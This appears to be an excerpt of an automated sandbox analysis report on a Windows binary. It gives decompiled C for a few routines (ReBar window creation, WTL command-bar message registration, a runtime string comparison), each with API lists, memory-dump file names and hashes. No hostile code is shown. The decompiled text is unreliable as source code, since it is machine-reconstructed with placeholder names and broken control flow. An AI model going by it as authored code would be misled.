                                                                                                                                                                                                                                                                                          • API String ID: 1942056148-3887548279
                                                                                                                                                                                                                                                                                          • Opcode ID: b7566def5dce7295b3bfdb051fd3344517c7fbb1541c43130bcb1f84f5a892ef
                                                                                                                                                                                                                                                                                          • Instruction ID: 9812b3fddc5463f1fde1e88d2c8894f7007540630c953c143b08e44da5724e8e
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b7566def5dce7295b3bfdb051fd3344517c7fbb1541c43130bcb1f84f5a892ef
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6D110C70E042199BCB14DFADA845AEEBBB8FF08300F40416EE505E2341D77099818BA9
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                          			E0080D050(struct HWND__* __ecx) {
                                                                                                                                                                                                                                                                                          				int _v8;
                                                                                                                                                                                                                                                                                          				int _v12;
                                                                                                                                                                                                                                                                                          				void* _v16;
                                                                                                                                                                                                                                                                                          				struct HWND__* _t8;
                                                                                                                                                                                                                                                                                          				struct HWND__* _t15;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_t15 = CreateWindowExA(0, "ReBarWindow32", 0, 0x56002640, 0, 0, 0x64, 0x64, __ecx, 0xe800,  *0x880c08, 0);
                                                                                                                                                                                                                                                                                          				_t8 = 0;
                                                                                                                                                                                                                                                                                          				if(_t15 == 0) {
                                                                                                                                                                                                                                                                                          					L4:
                                                                                                                                                                                                                                                                                          					return _t8;
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					_v12 = 0;
                                                                                                                                                                                                                                                                                          					_v8 = 0;
                                                                                                                                                                                                                                                                                          					_v16 = 0xc;
                                                                                                                                                                                                                                                                                          					_v12 = 0;
                                                                                                                                                                                                                                                                                          					if(SendMessageA(_t15, 0x404, 0,  &_v16) != 0) {
                                                                                                                                                                                                                                                                                          						_t8 = _t15;
                                                                                                                                                                                                                                                                                          						goto L4;
                                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                                          						DestroyWindow(_t15);
                                                                                                                                                                                                                                                                                          						return 0;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          			}








                                                                                                                                                                                                                                                                                          0x0080d081
                                                                                                                                                                                                                                                                                          0x0080d083
                                                                                                                                                                                                                                                                                          0x0080d087
                                                                                                                                                                                                                                                                                          0x0080d0be
                                                                                                                                                                                                                                                                                          0x0080d0c2
                                                                                                                                                                                                                                                                                          0x0080d089
                                                                                                                                                                                                                                                                                          0x0080d093
                                                                                                                                                                                                                                                                                          0x0080d097
                                                                                                                                                                                                                                                                                          0x0080d09a
                                                                                                                                                                                                                                                                                          0x0080d0a1
                                                                                                                                                                                                                                                                                          0x0080d0ac
                                                                                                                                                                                                                                                                                          0x0080d0bc
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0080d0ae
                                                                                                                                                                                                                                                                                          0x0080d0af
                                                                                                                                                                                                                                                                                          0x0080d0bb
                                                                                                                                                                                                                                                                                          0x0080d0bb
                                                                                                                                                                                                                                                                                          0x0080d0ac

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000001.00000002.711552533.0000000000801000.00000020.00000001.01000000.00000006.sdmp, Offset: 00800000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.711459674.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712110114.0000000000820000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712110114.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712946985.0000000000869000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713011724.000000000086C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713140868.0000000000880000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713182892.0000000000883000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_800000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Window$CreateDestroyMessageSend
                                                                                                                                                                                                                                                                                          • String ID: ReBarWindow32
                                                                                                                                                                                                                                                                                          • API String ID: 238161798-2848004845
                                                                                                                                                                                                                                                                                          • Opcode ID: e975115d6d330499dd9749004830726783cd15277b3cb6165161ddfb10c38bdf
                                                                                                                                                                                                                                                                                          • Instruction ID: 5fed4fe01efeb143157372eeeba3557ad06f23fe653ef34a162da86f4142a486
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e975115d6d330499dd9749004830726783cd15277b3cb6165161ddfb10c38bdf
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BFF04471B51314BBF720DFA89C0AFAA7BA8EB04B11F108155FA08FA2C0E6B059008B95
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                          			E0080FAB0() {
                                                                                                                                                                                                                                                                                          				intOrPtr _t1;
                                                                                                                                                                                                                                                                                          				intOrPtr _t2;
                                                                                                                                                                                                                                                                                          				intOrPtr _t4;
                                                                                                                                                                                                                                                                                          				struct _CRITICAL_SECTION* _t5;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_t1 =  *0x8819a4; // 0x0
                                                                                                                                                                                                                                                                                          				if(_t1 == 0) {
                                                                                                                                                                                                                                                                                          					_t4 =  *0x88196c; // 0x8819bc
                                                                                                                                                                                                                                                                                          					_t5 = _t4 + 0x10;
                                                                                                                                                                                                                                                                                          					EnterCriticalSection(_t5);
                                                                                                                                                                                                                                                                                          					if( *0x8819a4 == 0) {
                                                                                                                                                                                                                                                                                          						 *0x8819a4 = RegisterWindowMessageA("WTL_CmdBar_InternalAutoPopupMsg");
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					LeaveCriticalSection(_t5);
                                                                                                                                                                                                                                                                                          					_t2 =  *0x8819a4; // 0x0
                                                                                                                                                                                                                                                                                          					return _t2;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				return _t1;
                                                                                                                                                                                                                                                                                          			}







                                                                                                                                                                                                                                                                                          0x0080fab0
                                                                                                                                                                                                                                                                                          0x0080fab8
                                                                                                                                                                                                                                                                                          0x0080faba
                                                                                                                                                                                                                                                                                          0x0080fac0
                                                                                                                                                                                                                                                                                          0x0080fac4
                                                                                                                                                                                                                                                                                          0x0080fad1
                                                                                                                                                                                                                                                                                          0x0080fade
                                                                                                                                                                                                                                                                                          0x0080fade
                                                                                                                                                                                                                                                                                          0x0080fae4
                                                                                                                                                                                                                                                                                          0x0080faea
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0080faea
                                                                                                                                                                                                                                                                                          0x0080faf0

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(008819AC,?,0080C31F), ref: 0080FAC4
                                                                                                                                                                                                                                                                                          • RegisterWindowMessageA.USER32(WTL_CmdBar_InternalAutoPopupMsg), ref: 0080FAD8
                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(008819AC), ref: 0080FAE4
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          • WTL_CmdBar_InternalAutoPopupMsg, xrefs: 0080FAD3
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000001.00000002.711552533.0000000000801000.00000020.00000001.01000000.00000006.sdmp, Offset: 00800000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.711459674.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712110114.0000000000820000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712110114.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712946985.0000000000869000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713011724.000000000086C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713140868.0000000000880000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713182892.0000000000883000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_800000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: CriticalSection$EnterLeaveMessageRegisterWindow
                                                                                                                                                                                                                                                                                          • String ID: WTL_CmdBar_InternalAutoPopupMsg
                                                                                                                                                                                                                                                                                          • API String ID: 6923546-631010736
                                                                                                                                                                                                                                                                                          • Opcode ID: e515e4f3543f1667cf1ac726bb3ec9b60a1fcd801937976c5cf38450313f0e82
                                                                                                                                                                                                                                                                                          • Instruction ID: ba5aae5b839ce52ceb4748e57c2e29d5bb0559d79269bdc92ace6f5084592640
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e515e4f3543f1667cf1ac726bb3ec9b60a1fcd801937976c5cf38450313f0e82
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1FE0B631903220DFDF619B18FE1CAAA3F68FF45315B884011F80097662DF35584B8F56
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                          			E0080FB00() {
                                                                                                                                                                                                                                                                                          				intOrPtr _t1;
                                                                                                                                                                                                                                                                                          				intOrPtr _t2;
                                                                                                                                                                                                                                                                                          				intOrPtr _t4;
                                                                                                                                                                                                                                                                                          				struct _CRITICAL_SECTION* _t5;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_t1 =  *0x8819a8; // 0x0
                                                                                                                                                                                                                                                                                          				if(_t1 == 0) {
                                                                                                                                                                                                                                                                                          					_t4 =  *0x88196c; // 0x8819bc
                                                                                                                                                                                                                                                                                          					_t5 = _t4 + 0x10;
                                                                                                                                                                                                                                                                                          					EnterCriticalSection(_t5);
                                                                                                                                                                                                                                                                                          					if( *0x8819a8 == 0) {
                                                                                                                                                                                                                                                                                          						 *0x8819a8 = RegisterWindowMessageA("WTL_CmdBar_InternalGetBarMsg");
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					LeaveCriticalSection(_t5);
                                                                                                                                                                                                                                                                                          					_t2 =  *0x8819a8; // 0x0
                                                                                                                                                                                                                                                                                          					return _t2;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				return _t1;
                                                                                                                                                                                                                                                                                          			}







                                                                                                                                                                                                                                                                                          0x0080fb00
                                                                                                                                                                                                                                                                                          0x0080fb08
                                                                                                                                                                                                                                                                                          0x0080fb0a
                                                                                                                                                                                                                                                                                          0x0080fb10
                                                                                                                                                                                                                                                                                          0x0080fb14
                                                                                                                                                                                                                                                                                          0x0080fb21
                                                                                                                                                                                                                                                                                          0x0080fb2e
                                                                                                                                                                                                                                                                                          0x0080fb2e
                                                                                                                                                                                                                                                                                          0x0080fb34
                                                                                                                                                                                                                                                                                          0x0080fb3a
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0080fb3a
                                                                                                                                                                                                                                                                                          0x0080fb40

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(008819AC,?,0080C34D), ref: 0080FB14
                                                                                                                                                                                                                                                                                          • RegisterWindowMessageA.USER32(WTL_CmdBar_InternalGetBarMsg), ref: 0080FB28
                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(008819AC), ref: 0080FB34
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          • WTL_CmdBar_InternalGetBarMsg, xrefs: 0080FB23
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000001.00000002.711552533.0000000000801000.00000020.00000001.01000000.00000006.sdmp, Offset: 00800000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.711459674.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712110114.0000000000820000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712110114.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712946985.0000000000869000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713011724.000000000086C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713140868.0000000000880000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713182892.0000000000883000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_800000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: CriticalSection$EnterLeaveMessageRegisterWindow
                                                                                                                                                                                                                                                                                          • String ID: WTL_CmdBar_InternalGetBarMsg
                                                                                                                                                                                                                                                                                          • API String ID: 6923546-1327875102
                                                                                                                                                                                                                                                                                          • Opcode ID: fc1018955a14542c00002ceb15b25ec0731d617e210f43047b78ea097dffe548
                                                                                                                                                                                                                                                                                          • Instruction ID: a6372746f2b29585524e4d2d49cb11e3c6a3e87d1a804ee34f7cd3d34fbcf977
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fc1018955a14542c00002ceb15b25ec0731d617e210f43047b78ea097dffe548
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6CE0B631902220EFDB619B18FD6DA963BA8FB05326B864011F80092662CF34598B8F56
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 97%
                                                                                                                                                                                                                                                                                          			E00815BAB(void* __ebx, void* __edi, signed char* _a4, signed int _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                                                                          				signed int _v7;
                                                                                                                                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                                                                                                                                          				char _v12;
                                                                                                                                                                                                                                                                                          				intOrPtr _v16;
                                                                                                                                                                                                                                                                                          				signed int _v20;
                                                                                                                                                                                                                                                                                          				char _v24;
                                                                                                                                                                                                                                                                                          				signed int _t72;
                                                                                                                                                                                                                                                                                          				signed int _t74;
                                                                                                                                                                                                                                                                                          				intOrPtr _t75;
                                                                                                                                                                                                                                                                                          				void* _t77;
                                                                                                                                                                                                                                                                                          				intOrPtr _t79;
                                                                                                                                                                                                                                                                                          				signed short _t82;
                                                                                                                                                                                                                                                                                          				void* _t84;
                                                                                                                                                                                                                                                                                          				signed short _t87;
                                                                                                                                                                                                                                                                                          				intOrPtr _t91;
                                                                                                                                                                                                                                                                                          				signed int _t97;
                                                                                                                                                                                                                                                                                          				signed int _t100;
                                                                                                                                                                                                                                                                                          				void* _t101;
                                                                                                                                                                                                                                                                                          				signed int _t102;
                                                                                                                                                                                                                                                                                          				void* _t103;
                                                                                                                                                                                                                                                                                          				signed int _t104;
                                                                                                                                                                                                                                                                                          				signed char* _t114;
                                                                                                                                                                                                                                                                                          				signed char* _t115;
                                                                                                                                                                                                                                                                                          				signed int _t116;
                                                                                                                                                                                                                                                                                          				signed int _t117;
                                                                                                                                                                                                                                                                                          				signed int _t118;
                                                                                                                                                                                                                                                                                          				signed int _t124;
                                                                                                                                                                                                                                                                                          				signed int _t125;
                                                                                                                                                                                                                                                                                          				void* _t127;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				E008159F5(__ebx,  &_v24, __edi, _a12);
                                                                                                                                                                                                                                                                                          				_t114 = _a4;
                                                                                                                                                                                                                                                                                          				_t129 = _t114;
                                                                                                                                                                                                                                                                                          				if(_t114 != 0) {
                                                                                                                                                                                                                                                                                          					_push(__ebx);
                                                                                                                                                                                                                                                                                          					_t97 = _a8;
                                                                                                                                                                                                                                                                                          					__eflags = _t97;
                                                                                                                                                                                                                                                                                          					if(__eflags != 0) {
                                                                                                                                                                                                                                                                                          						_t72 = _v20;
                                                                                                                                                                                                                                                                                          						__eflags =  *(_t72 + 8);
                                                                                                                                                                                                                                                                                          						if( *(_t72 + 8) != 0) {
                                                                                                                                                                                                                                                                                          							_push(__edi);
                                                                                                                                                                                                                                                                                          							while(1) {
                                                                                                                                                                                                                                                                                          								_t100 =  *_t114 & 0x000000ff;
                                                                                                                                                                                                                                                                                          								_t124 = _t100 & 0x000000ff;
                                                                                                                                                                                                                                                                                          								_t115 =  &(_t114[1]);
                                                                                                                                                                                                                                                                                          								__eflags =  *(_t124 + _t72 + 0x1d) & 0x00000004;
                                                                                                                                                                                                                                                                                          								_a4 = _t115;
                                                                                                                                                                                                                                                                                          								if(( *(_t124 + _t72 + 0x1d) & 0x00000004) == 0) {
                                                                                                                                                                                                                                                                                          									goto L20;
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          								__eflags =  *_t115;
                                                                                                                                                                                                                                                                                          								if(__eflags != 0) {
                                                                                                                                                                                                                                                                                          									_t84 = E00818008(_t97, 0x200, __eflags,  &_v24,  *((intOrPtr*)(_t72 + 0xc)), 0x200, _t115 - 1, 2,  &_v8, 2,  *((intOrPtr*)(_t72 + 4)), 1);
                                                                                                                                                                                                                                                                                          									_t127 = _t127 + 0x24;
                                                                                                                                                                                                                                                                                          									__eflags = _t84 - 1;
                                                                                                                                                                                                                                                                                          									if(_t84 != 1) {
                                                                                                                                                                                                                                                                                          										__eflags = _t84 - 2;
                                                                                                                                                                                                                                                                                          										if(__eflags != 0) {
                                                                                                                                                                                                                                                                                          											goto L37;
                                                                                                                                                                                                                                                                                          										} else {
                                                                                                                                                                                                                                                                                          											_t87 = (_v8 & 0x000000ff) * 0x100 + (_v7 & 0x000000ff);
                                                                                                                                                                                                                                                                                          											__eflags = _t87;
                                                                                                                                                                                                                                                                                          											_t125 = _t87 & 0x0000ffff;
                                                                                                                                                                                                                                                                                          											goto L19;
                                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                                          									} else {
                                                                                                                                                                                                                                                                                          										_t125 = _v8 & 0x000000ff;
                                                                                                                                                                                                                                                                                          										L19:
                                                                                                                                                                                                                                                                                          										_a4 =  &(_a4[1]);
                                                                                                                                                                                                                                                                                          										_t72 = _v20;
                                                                                                                                                                                                                                                                                          										goto L23;
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                                                          									_t125 = 0;
                                                                                                                                                                                                                                                                                          									L23:
                                                                                                                                                                                                                                                                                          									_t102 =  *_t97 & 0x000000ff;
                                                                                                                                                                                                                                                                                          									_t117 = _t102 & 0x000000ff;
                                                                                                                                                                                                                                                                                          									_t97 = _t97 + 1;
                                                                                                                                                                                                                                                                                          									__eflags =  *(_t117 + _t72 + 0x1d) & 0x00000004;
                                                                                                                                                                                                                                                                                          									if(( *(_t117 + _t72 + 0x1d) & 0x00000004) == 0) {
                                                                                                                                                                                                                                                                                          										_t118 = _t102;
                                                                                                                                                                                                                                                                                          										_t103 = _t118 + _t72;
                                                                                                                                                                                                                                                                                          										__eflags =  *(_t103 + 0x1d) & 0x00000010;
                                                                                                                                                                                                                                                                                          										if(( *(_t103 + 0x1d) & 0x00000010) == 0) {
                                                                                                                                                                                                                                                                                          											_t104 = _t118;
                                                                                                                                                                                                                                                                                          										} else {
                                                                                                                                                                                                                                                                                          											_t104 =  *(_t103 + 0x11d) & 0x000000ff;
                                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                                          										goto L34;
                                                                                                                                                                                                                                                                                          									} else {
                                                                                                                                                                                                                                                                                          										__eflags =  *_t97;
                                                                                                                                                                                                                                                                                          										if(__eflags != 0) {
                                                                                                                                                                                                                                                                                          											_t77 = E00818008(_t97, 0x200, __eflags,  &_v24,  *((intOrPtr*)(_t72 + 0xc)), 0x200, _t97 - 1, 2,  &_v8, 2,  *((intOrPtr*)(_t72 + 4)), 1);
                                                                                                                                                                                                                                                                                          											_t127 = _t127 + 0x24;
                                                                                                                                                                                                                                                                                          											__eflags = _t77 - 1;
                                                                                                                                                                                                                                                                                          											if(_t77 != 1) {
                                                                                                                                                                                                                                                                                          												__eflags = _t77 - 2;
                                                                                                                                                                                                                                                                                          												if(__eflags != 0) {
                                                                                                                                                                                                                                                                                          													L37:
                                                                                                                                                                                                                                                                                          													 *((intOrPtr*)(E00817A0D(__eflags))) = 0x16;
                                                                                                                                                                                                                                                                                          													__eflags = _v12;
                                                                                                                                                                                                                                                                                          													if(_v12 != 0) {
                                                                                                                                                                                                                                                                                          														_t79 = _v16;
                                                                                                                                                                                                                                                                                          														_t61 = _t79 + 0x70;
                                                                                                                                                                                                                                                                                          														 *_t61 =  *(_t79 + 0x70) & 0xfffffffd;
                                                                                                                                                                                                                                                                                          														__eflags =  *_t61;
                                                                                                                                                                                                                                                                                          													}
                                                                                                                                                                                                                                                                                          													_t74 = 0x7fffffff;
                                                                                                                                                                                                                                                                                          												} else {
                                                                                                                                                                                                                                                                                          													_t82 = (_v8 & 0x000000ff) * 0x100 + (_v7 & 0x000000ff);
                                                                                                                                                                                                                                                                                          													__eflags = _t82;
                                                                                                                                                                                                                                                                                          													_t104 = _t82 & 0x0000ffff;
                                                                                                                                                                                                                                                                                          													goto L30;
                                                                                                                                                                                                                                                                                          												}
                                                                                                                                                                                                                                                                                          											} else {
                                                                                                                                                                                                                                                                                          												_t104 = _v8 & 0x000000ff;
                                                                                                                                                                                                                                                                                          												L30:
                                                                                                                                                                                                                                                                                          												_t72 = _v20;
                                                                                                                                                                                                                                                                                          												_t97 = _t97 + 1;
                                                                                                                                                                                                                                                                                          												goto L34;
                                                                                                                                                                                                                                                                                          											}
                                                                                                                                                                                                                                                                                          										} else {
                                                                                                                                                                                                                                                                                          											_t104 = 0;
                                                                                                                                                                                                                                                                                          											L34:
                                                                                                                                                                                                                                                                                          											__eflags = _t104 - _t125;
                                                                                                                                                                                                                                                                                          											if(_t104 != _t125) {
                                                                                                                                                                                                                                                                                          												asm("sbb eax, eax");
                                                                                                                                                                                                                                                                                          												_t74 = (_t72 & 0x00000002) - 1;
                                                                                                                                                                                                                                                                                          												__eflags = _v12;
                                                                                                                                                                                                                                                                                          												if(_v12 != 0) {
                                                                                                                                                                                                                                                                                          													 *(_v16 + 0x70) =  *(_v16 + 0x70) & 0xfffffffd;
                                                                                                                                                                                                                                                                                          												}
                                                                                                                                                                                                                                                                                          											} else {
                                                                                                                                                                                                                                                                                          												__eflags = _t125;
                                                                                                                                                                                                                                                                                          												if(_t125 == 0) {
                                                                                                                                                                                                                                                                                          													__eflags = _v12;
                                                                                                                                                                                                                                                                                          													if(_v12 != 0) {
                                                                                                                                                                                                                                                                                          														_t75 = _v16;
                                                                                                                                                                                                                                                                                          														_t69 = _t75 + 0x70;
                                                                                                                                                                                                                                                                                          														 *_t69 =  *(_t75 + 0x70) & 0xfffffffd;
                                                                                                                                                                                                                                                                                          														__eflags =  *_t69;
                                                                                                                                                                                                                                                                                          													}
                                                                                                                                                                                                                                                                                          													_t74 = 0;
                                                                                                                                                                                                                                                                                          													__eflags = 0;
                                                                                                                                                                                                                                                                                          												} else {
                                                                                                                                                                                                                                                                                          													_t114 = _a4;
                                                                                                                                                                                                                                                                                          													continue;
                                                                                                                                                                                                                                                                                          												}
                                                                                                                                                                                                                                                                                          											}
                                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          								goto L46;
                                                                                                                                                                                                                                                                                          								L20:
                                                                                                                                                                                                                                                                                          								_t116 = _t100;
                                                                                                                                                                                                                                                                                          								_t101 = _t116 + _t72;
                                                                                                                                                                                                                                                                                          								__eflags =  *(_t101 + 0x1d) & 0x00000010;
                                                                                                                                                                                                                                                                                          								if(( *(_t101 + 0x1d) & 0x00000010) == 0) {
                                                                                                                                                                                                                                                                                          									_t125 = _t116;
                                                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                                                          									_t125 =  *(_t101 + 0x11d) & 0x000000ff;
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          								goto L23;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                                          							_t74 = E00818087(_t114, __edi, _t114, _t97,  &_v24);
                                                                                                                                                                                                                                                                                          							__eflags = _v12;
                                                                                                                                                                                                                                                                                          							if(_v12 != 0) {
                                                                                                                                                                                                                                                                                          								 *(_v16 + 0x70) =  *(_v16 + 0x70) & 0xfffffffd;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                                          						 *((intOrPtr*)(E00817A0D(__eflags))) = 0x16;
                                                                                                                                                                                                                                                                                          						E008179BB();
                                                                                                                                                                                                                                                                                          						__eflags = _v12 - _t97;
                                                                                                                                                                                                                                                                                          						if(_v12 != _t97) {
                                                                                                                                                                                                                                                                                          							_t91 = _v16;
                                                                                                                                                                                                                                                                                          							_t11 = _t91 + 0x70;
                                                                                                                                                                                                                                                                                          							 *_t11 =  *(_t91 + 0x70) & 0xfffffffd;
                                                                                                                                                                                                                                                                                          							__eflags =  *_t11;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						_t74 = 0x7fffffff;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					L46:
                                                                                                                                                                                                                                                                                          					return _t74;
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					 *((intOrPtr*)(E00817A0D(_t129))) = 0x16;
                                                                                                                                                                                                                                                                                          					E008179BB();
                                                                                                                                                                                                                                                                                          					if(_v12 != 0) {
                                                                                                                                                                                                                                                                                          						 *(_v16 + 0x70) =  *(_v16 + 0x70) & 0xfffffffd;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					return 0x7fffffff;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          			}
































                                                                                                                                                                                                                                                                                          0x00815bb9
                                                                                                                                                                                                                                                                                          0x00815bbe
                                                                                                                                                                                                                                                                                          0x00815bc1
                                                                                                                                                                                                                                                                                          0x00815bc3
                                                                                                                                                                                                                                                                                          0x00815be9
                                                                                                                                                                                                                                                                                          0x00815bea
                                                                                                                                                                                                                                                                                          0x00815bed
                                                                                                                                                                                                                                                                                          0x00815bef
                                                                                                                                                                                                                                                                                          0x00815c17
                                                                                                                                                                                                                                                                                          0x00815c1a
                                                                                                                                                                                                                                                                                          0x00815c1e
                                                                                                                                                                                                                                                                                          0x00815c44
                                                                                                                                                                                                                                                                                          0x00815c4b
                                                                                                                                                                                                                                                                                          0x00815c4b
                                                                                                                                                                                                                                                                                          0x00815c4e
                                                                                                                                                                                                                                                                                          0x00815c51
                                                                                                                                                                                                                                                                                          0x00815c52
                                                                                                                                                                                                                                                                                          0x00815c57
                                                                                                                                                                                                                                                                                          0x00815c5a
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00815c5c
                                                                                                                                                                                                                                                                                          0x00815c5f
                                                                                                                                                                                                                                                                                          0x00815c7c
                                                                                                                                                                                                                                                                                          0x00815c81
                                                                                                                                                                                                                                                                                          0x00815c84
                                                                                                                                                                                                                                                                                          0x00815c87
                                                                                                                                                                                                                                                                                          0x00815c8f
                                                                                                                                                                                                                                                                                          0x00815c92
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00815c98
                                                                                                                                                                                                                                                                                          0x00815ca9
                                                                                                                                                                                                                                                                                          0x00815ca9
                                                                                                                                                                                                                                                                                          0x00815cac
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00815cac
                                                                                                                                                                                                                                                                                          0x00815c89
                                                                                                                                                                                                                                                                                          0x00815c89
